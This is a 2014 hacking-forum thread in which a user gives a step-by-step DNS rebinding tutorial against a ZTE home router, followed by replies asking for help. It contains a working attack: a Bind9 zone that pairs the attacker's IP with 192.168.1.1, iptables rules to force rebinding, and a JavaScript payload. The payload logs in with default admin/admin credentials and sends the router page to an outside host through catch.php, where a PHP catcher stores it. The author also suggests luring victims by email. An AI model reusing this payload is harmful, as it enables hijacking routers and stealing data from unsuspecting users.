chevron_left chevron_right
Login Register invert_colors photo_library


Stay updated and chat with others! - Join the Discord!
Thread Rating:
  • 0 Vote(s) - 0 Average


DNS Rebinding Attack filter_list
Author
Message
DNS Rebinding Attack #1
Hello
(I am too tired now... I will clean it up and resize the snapshots tomorrow)

This tutorial is dedicated to my friend @RootTheSystem

Note: this attack is not easy to orchestrate and implement, even though it is an old attack, unfortunately not much has been done about it.

So with not much to say here, we start...

What is DNS?
Domain Name System (DNS) is simply a system that receive a domain name, check some tables and returns the IP address(es) of the machine (host) of that domain according to the tables...

Example:
Code:
nslookup google.com
Server:        192.168.1.1
Address:    192.168.1.1#53

Non-authoritative answer:
Name:    google.com
Address: 213.139.49.96
Name:    google.com
Address: 213.139.49.123
Name:    google.com
Address: 213.139.49.89
Name:    google.com
Address: 213.139.49.109
Name:    google.com
Address: 213.139.49.82
Name:    google.com
Address: 213.139.49.110
Name:    google.com
Address: 213.139.49.88
Name:    google.com
Address: 213.139.49.102
Name:    google.com
Address: 213.139.49.103
Name:    google.com
Address: 213.139.49.116
Name:    google.com
Address: 213.139.49.117
Name:    google.com
Address: 213.139.49.95

In the above example we query the name server (address 192.168.1.1:53) for google.com and we receive the response as you can see above, naturally Google has many IP addresses, so if one server (machine) is down, others will back it up.

When the browser receives these IP addresses it will cache them, and will use one IP address, if it goes down it will pick another one from the list (and will not issue a request to resolve the domain name) and link it to that domain name, and this is my friends is called rebinding, simple?

The client (browsers for example) will first check the cache table as we said before, if there are no records about this domain name, it will ask the OS about it, the OS will do the same thing and will check the cache first (if it exists), if nothing found there it will ask the Name Server (in my case it is on 192.168.1.1... more about this later), and the Name Server (the DNS Server) will do the same thing (cache first then ask another DNS server) so on till someone will get you the answer, this is why when using ping (or any network tool) it will start faster when you provide the IP instead of domain name (try it...)

OK, if you are on Windows you can view the DNS cached using ipconfig command:
Code:
ipconfig /displaydns

On Linux it is totally different, because Linux (by nature) doesn't cache DNS records, you will need to install special tools for that... (not our topic)

To see the address of your DNS server, under Windows you can again use ipconfig command:
Code:
ipconfig/all


On Linux the name server is saved in /etc/resolv.conf and as I said, in my case it is: nameserver 192.168.1.1

In both OS (Linux and Windows) there is a file named host (or hosts) that file also contains some records for DNS.

The following image will hopefully give you an idea of what I am talking about:
[Image: DNS_in_the_real_world.svg]
[source: http://en.wikipedia.org/wiki/Domain_Name_System]

OK, all that is good, now what?

Although the list of DNS servers is big, I want to mention only two in this tutorial:
  • Bind9: a well know DNS server, which I will be using in this tutorial to configure the domain name.
  • Dnsmasq: a DNS and DHCP server, also very common specially in routers and network devices, we won't be using this one, but I just want you to know about it.

So for now, all you need to know that Bind9 is a DNS server that is used to configure domain names, I will not go into details about DNS on this tutorial as I am making another one that will cover the subject with a small yet useful guide for Bind9.

OK, let's talk about the scenario that I am after... as you may already know home routers usually has a GUI for administration that you can access using a browser as it is usually a web page, usually the URL is http://192.168.1.1/ where 192.168.1.1 is the gateway, use ipconfig on windows to find the gateway, for Linux you can just issue "route" command, the default gateway is the address where is says default:
Code:
root@Kali:~# route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0
192.168.1.0     *               255.255.255.0   U     0      0        0 wlan0

OK, so what is the big deal about this?
Well... normally, you can access the router from the LAN (Local Area Network), but you can't access it from the Internet (or WAN), because the firewall in the router will block the connection (usually this is configurable but let's assume that in my case it is not!), my goal is to access this page from the Internet!

The following snapshot shows the scan result, the IP is a dynamic public IP (not valid anymore):
[Image: wkf8aCz.png]

As you can see the ports 80 is filtered (by firewall) and 8080 is closed (nothing is listening)

So... How am I going to do that?
Well, to answer that question, we'll have to see what we already have:
  • A router with GUI, that we can access from the default gateway address (192.168.1.1)
  • Default username and password (I will tell you how I got this info shortly)
  • IP address of the victim (more about this later)

OK, in Jordan (where I live) we have few ISPs (Internet Service Provider), and it is easy to figure out what brands/devices they are using as home routers, and with a little search you can find the default username and password of almost any device on the Internet!

About the IP address, of the victim, in my case the victim is my brother (how also lives in Jordan), but in a real attack I would send the victim an email with a link... I think you know the rest!

OK, so what can we do with all that info? the answer is ... more than you can ever imagine!

DNS Rebinding Attack

DNS rebinding is an attack that targets web-browsers mainly, it was discovered in 1996 and affected Java Virtual Machine at that time.

Firefox did something to avoid this attack (thank you Firefox team), in fact I was talking about this with @Anima Templi the other day on IRC channel, I thought that Firefox has a bug because the attack didn't work, but when I investigated more about the error, I found that it was not a bug, but a security thing! So ... well done Firefox Smile

OK... Chrome :Ambivalent: let's use that (without comments)

To understand how this attack works I have to explain one thing first, the Same-Origin Policy.

Let's check out this code (HTML):
[Image: onhzjEw.png]

This page needs to get two resources, one from http://google.com/ and the other is from the same origin, which means:
  • Same IP address
  • Same port number (80)
  • Same scheme (http)

OK, the result will look like this (I am running Chrome + "inspect element" tool):
[Image: KhU6LIM.png]

As we can see the first request was ignored and nothing is returned, while the second request was processed successfully, because it followed the Same-Origin Policy, which demands that the web page should request resources only from places that have the same origin as the page itself (as we saw above), there are three exception for this policy:
  • Post: <form action="http://differnet-origin.com/reource.rc method ="post">
  • Scrit: <script src="http://different-origin/resource.js>...
  • CSS: <link rel="stylesheet" type="text/css" href="http://different-origin/style.css">

We will be using that in our attack ... so please remember all this.

The Attack

How does the attack works:
  • The victim should access the domain (via a link sent by email maybe, or posted on a forum ... etc.)
  • The DNS server will resolve the domain name with two IP addresses, the first one is the address of our website (web server), and the second is the address of the target device on the LAN (192.168.1.1), the order in this case is important!!!
  • The victim's browser will access the website and load the page, with JavaScript code to initiate the attack, the script will keep requesting a resource from the web server, this resource is the page that we want to get from the route's GUI and it does NOT exists on the web server (the request will generate 404 error)
  • We detect the victim, and block the requests using our firewall on the web server: iptables -A INPUT -s <victim ip address> -p tcp --dport 80 -j REJECT --reject-with tcp-reset
  • Because of DNS pinning (cache), the browser will redirect the request to the second IP address (rebind), but it will keep showing the original/old web-page because it is cached!
  • The page will receive the resource (the GUI page of the router) and handle it to the attack (us) using another port to IP address)

So to do all that we need:
  • A DNS server to register a domain name (I will use Bind9)
  • A web server (I will use Apache)
  • The page + payload!
  • A victim (my brother)
  • A target: which is basically any device or resource connected to the LAN

OK ... a littel about JavaScript:
  • We will use XMLHttpRequest (part of Ajax) to request the resource periodically (we will also set a timer).
  • Once the reource (the page) is available, we can send it to us using JSON request, by the way, the difference between JSON and JSONP is the the later can request a resource from a different origin while JSON can't (not tested though)

The following is a snapshot of Wireshark capturing the authentication process of the router (I have the same router and I tested that locally), by the way the router is ZTE family... check my other tutorial about how to hack into this router via telnet!
[Image: dERGUjg.png]

Note: the username is admin and the password is also admin, this is clearly a default username and password, the Frm_Logintiken is a token generated by the router and it basically increment by one on each successful login! I used Regular Expression to scrape this value.

I also noticed that the page that I want (the my target) is requested later (file name template.gch) gch is a file extension used by GCC for precompiled header files commonly used in router and similar "small on space" devices.

OK, so I installed CentOS (Linux) on VirtualBox, configured the network, installed both Bind9 and Apache, flushed the iptables/firewall (I know it is stupid but... fast), then on my router I configured this server as DMZ host (all incoming connections from the internet will be redirected to this host/IP address...

To get my public IP address I had to use a little script as I don't have anything graphical on that server (I use CentOS minimal installation), this is the script (very simple):
Code:
import urllib
myIP = urllib.urlopen("http://echoip.com").read()
print(myIP)

Result: 92.253.72.62

Note: all the IP addresses are real, they are dynamic though and renewed once a day I think or every 12 hours (I didn't check and I don't care), so please don't try to be funny and scan them as they are not mine! If you want a server to hack contact me on the IRC channel and I will give you access to my sandbox!

OK, let's configure Bind9:
Code:
[root@localhost ~]# cat /etc/named.conf
//
// named.conf
//
// Provided by Red Hat bind package to configure the ISC BIND named(8) DNS
// server as a caching only nameserver (as a localhost DNS resolver only).
//
// See /usr/share/doc/bind*/sample/ for example named configuration files.
//

options {
    //listen-on port 53 { 127.0.0.1; };
    listen-on-v6 port 53 { ::1; };
    directory     "/var/named";
    dump-file     "/var/named/data/cache_dump.db";
        statistics-file "/var/named/data/named_stats.txt";
        memstatistics-file "/var/named/data/named_mem_stats.txt";
    allow-query     { any; };
    recursion yes;
    rrset-order {order fixed;};
    dnssec-enable yes;
    dnssec-validation yes;
    dnssec-lookaside auto;
    forwarders { 192.168.1.1; };
    /* Path to ISC DLV key */
    bindkeys-file "/etc/named.iscdlv.key";
    managed-keys-directory "/var/named/dynamic";
};

logging {
        channel default_debug {
                file "data/named.run";
                severity dynamic;
        };
};

zone "." IN {
    type hint;
    file "named.ca";
};

zone "ligeti.com" IN {
    type master;
    file "ligeti.com.zone";
    allow-update { none; };
};

include "/etc/named.rfc1912.zones";
include "/etc/named.root.key";

Notes:
  • allow-query { any; } // this will allow connection from anywhere
  • recursion yes; // this will make the server recursive, so the victim can still use it to access other websites without being blocked
  • forwarders { 192.168.1.1; }; // if the domain name is not register on this server check this IP (forward the query)
  • rrset-order {order fixed;};// the most important line, this will force Bind9 to retuen the IP addresses in fixed order, the order is VERY important in this attack
  • I added the sone "ligeti.com", which is the domain I am going to use in the attack

And here is the configuration for ligeti.com zone (domain name):
Code:
[root@localhost ~]# cat /var/named/ligeti.com.zone
$TTL 86400
@   IN  SOA     ns1.ligeti.com. root.ligeti.com. (
        2013042201  ;Serial
        3600        ;Refresh
        1800        ;Retry
        604800      ;Expire
        86400       ;Minimum TTL
)
; Specify our two nameservers
        IN    NS        ns1.ligeti.com.
; Resolve nameserver hostnames to IP.
ns1        IN    A        92.253.72.62

; Define hostname -> IP pairs
@        IN    A        92.253.72.62
        IN    A        192.168.1.1

As you can see at the end we added both IPs, the first address is for the web server, and the second is the IP addres of our target (the router)

On the victim machine I had to configure the router manually to add my DNS server to be the default server because I didn't register mine to be public (long story) but the effect is the sam... anyway, this is how the network configuration of the victim looks like;
[Image: VJsDTlJ.png]

So if my brother try to access ligeti.com he will see my web server (403 error: "forbidden" as I don't have an index.php as a defult page... anyway)

The page that has the attack payload is offer.php, and here is how it looks on my brother's browser.
[Image: aflRTUG.png]

As you can see, in the console window the page is requesting a resource from http://ligeti.com/ all the time and getting the 403 error (forbidden), and I can see his IP address in the logs (/var/log/httpd/access_log)

Now let's see what will happen with I block port 80
Code:
iptables -A input -s 213.186.188.181 -p tcp --dport 80 -j REJECT --resect-with tcp-reset

At that moment, the victim's browser will rebind immediately, and start sending the request to the other IP address (192.168.1.1), to make it obvious and emphasize the effect I decided to popup an alert("hacked");
[Image: oBeBJrW.png]

Because I have only one server, I will need to send the response to that server, but how if I am blocking port 80? I have many options (like changing the port) but I did something more primitive, I flushed iptables, so now the page can connect to my web server again (before pressing OK), and in the console we can see the page is sending back to the server the data in a GET request.
[Image: dmeYHkz.png]

The result:
[Image: Boeexvx.png]

Done...!!!

Here is the full code (fast and very dirty):
Code:
<?php
      // cache this page for a long time
      header("Cache-Control: max-age=2592000");
    header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
?>
<html>
    <head>
    </head>
    <body>
        <h1>This is a sticky page...</h1>
          <script>
            var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g
            var timer = setInterval(function(){info();} ,5000);

            function info()
            {
            
                    xhr=new XMLHttpRequest();
                                
                xhr.open("GET", "http://ligeti.com/", false);
                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xhr.send();

                var result = pattern.exec(xhr.responseText);
                //alert (xhr.responseText);

                if(result != null)
                {
                    if (result.length > 1)
                    {
                        var login = new XMLHttpRequest();
                        var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin";
                        //console.log(result[1]);
                        login.open("POST", "http://ligeti.com/", false);
                                        login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                                        login.send(param);
                                    //console.log(login.responseText);
                        clearInterval(timer);
                        var template = new XMLHttpRequest();
                        template.open("GET", "http://ligeti.com/template.gch", false);
                        template.send();
                        //console.log(template.responseText);
                        alert("Hacked");
                        sendResults(template.responseText);
                    }
                }
            }
            function sendResults(data)
            {
                alert("Sending Data");
                myCallback= function(data){console.log(data)}
                        script = document.createElement('script');
                script.type = 'text/javascript';
                //myData =  data.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
                console.log(data);
                script.src =  encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
                document.head.appendChild(script);
                }
            info();
          </script>
    </body>
</html>

The code to capture the results (simple and dummy):
Code:
<?php
    $file = '/tmp/secret.html';
    $que = $_GET["secret"];
    file_put_contents($file, $que);
    echo ''.$que;
?>

OK what is missing (future work)
  • I need to encode the data (the results) before sedning it to the server!
  • I need to split the data into multiple chunks (pieces) and/or compress it.
  • I need to make a tunnel (using JavaScript) to gain more control!
  • I need to clear up the codes.


Conclusion
Well... just try to stay away from JavaScript (use NoScript or similar plugins in other browsers), and be aware of default username/password, and finally make sure that your browser is patched and updated!

The following video shows you how bad this attack can be.


Please leave your comments, questions, suggestions... anything you want to say!

Thank You!
Ligeti
(This post was last modified: 07-10-2014, 03:04 AM by Arkobee.)
[Image: wvBFmA5.png]

[+] 1 user Likes Ligeti's post
Reply

RE: DNS Rebinding Attack #2
I'm honored... Thanks for writing such a great tutorial. I'll need to research more about this attack, also have a few questions for you but I can ask them on IRC. No need to overcrowd here :Grin:
Thanks again!
Fuck You.

Reply

RE: DNS Rebinding Attack #3
(07-10-2014, 11:41 AM)Boomslang Wrote: I'm honored... Thanks for writing such a great tutorial. I'll need to research more about this attack, also have a few questions for you but I can ask them on IRC. No need to overcrowd here :Grin:
Thanks again!


can we have a video of this cause i am kinda lost and stuck on logintoken part !

whatever i do it's the same response from curl ..

curl "http://192.168.1.1/" --data "frashnum=^&action=login^&Frm_Logintoken=15^&Username=admin^&Password=admin"

Reply

RE: DNS Rebinding Attack #4
@Boomslang ..

Reply

RE: DNS Rebinding Attack #5
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang              ..

this is a very old thread. why even bother posting in it?
My IT skills that I know perfect is SQL, HTML ,css ,wordpress, PHP.
coding skills that I know is Java, JavaScript and C#

Reply

RE: DNS Rebinding Attack #6
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang              ..

this is a very old thread. why even bother posting in it?

I don't know ...
I want to get it done ...
But i am stack at setting the server and adding new commands to the page although i already have the commends ...
The steps aren't clear enough .
And i want to band the attack to evil twin .

Reply

RE: DNS Rebinding Attack #7
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang              ..

this is a very old thread. why even bother posting in it?
And i already did a post but no one answered me
https://sinister.ly/Thread-how-can-i-per...ocal-level


And on reddit and many other sites tho !

Reply

RE: DNS Rebinding Attack #8
(04-27-2019, 03:24 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang              ..

this is a very old thread. why even bother posting in it?
And i already  did  a post but no one answered  me
https://sinister.ly/Thread-how-can-i-per...ocal-level


And on reddit and many other sites tho !

Stop posting in this thread and go to your own and wait for an answer. This thread was made in 2014, aka 5 years ago and the member who made this thread hasn't been on since 2016, aka 3 years ago. You're not going to get an answer no matter how much you beg, and gravedigging is against the rules.
(This post was last modified: 04-27-2019, 05:03 PM by Nyx.)

Reply

RE: DNS Rebinding Attack #9
(04-27-2019, 03:21 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote:
(04-11-2019, 04:50 PM)mooooon Wrote: @Boomslang              ..

this is a very old thread. why even bother posting in it?

I don't know  ...
I want to get it done ...
But i am stack at setting the server and adding new commands to the page although  i already  have the commends ...
The steps aren't clear enough  .
And i want to band the attack  to evil twin .

please read the forum rules in this link below. !!
https://sinister.ly/misc.php?action=help&hid=8
My IT skills that I know perfect is SQL, HTML ,css ,wordpress, PHP.
coding skills that I know is Java, JavaScript and C#

Reply

RE: DNS Rebinding Attack #10
(04-27-2019, 05:01 PM)Nyx Wrote:
(04-27-2019, 03:24 PM)mooooon Wrote:
(04-27-2019, 07:58 AM)darkninja1980 Wrote: this is a very old thread. why even bother posting in it?
And i already  did  a post but no one answered  me
https://sinister.ly/Thread-how-can-i-per...ocal-level


And on reddit and many other sites tho !

Stop posting in this thread and go to your own and wait for an answer. This thread was made in 2014, aka 5 years ago and the member who made this thread hasn't been on since 2016, aka 3 years ago. You're not going to get an answer no matter how much you beg, and gravedigging is against the rules.

Ok that's fine

Reply






Users browsing this thread: 1 Guest(s)